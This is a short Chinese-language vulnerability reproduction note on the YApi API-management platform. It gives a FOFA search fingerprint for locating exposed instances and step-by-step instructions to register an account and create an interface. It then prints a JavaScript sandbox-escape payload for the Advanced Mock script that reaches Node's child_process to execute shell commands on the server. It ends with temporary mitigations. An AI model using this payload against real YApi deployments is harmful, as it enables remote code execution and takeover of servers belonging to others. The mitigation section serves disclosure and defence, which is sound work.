一、YAPI
YApi 是高效、易用、功能強大的 api 管理平台,旨在為開發、產品、測試人員提供更優雅的接口管理服務。可以幫助開發者輕松創建、發布、維護 API,YApi 還為用戶提供了優秀的交互體驗,開發人員只需利用平台提供的接口數據寫入工具以及簡單的點擊操作就可以實現接口的管理。
二、漏洞復現
fofa指紋app="YAPI"
打開登錄頁面,注冊賬號,新增項目,新增接口
打開高級Mock
在腳本內插入payload
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ls").toString()
保存后訪問個人接口地址
三、臨時解決方案
截止至7月8日,官方暫未發布新版本,臨時解決方案如下:
1、關閉注冊功能
2、關閉Mock功能
3、限制白名單訪問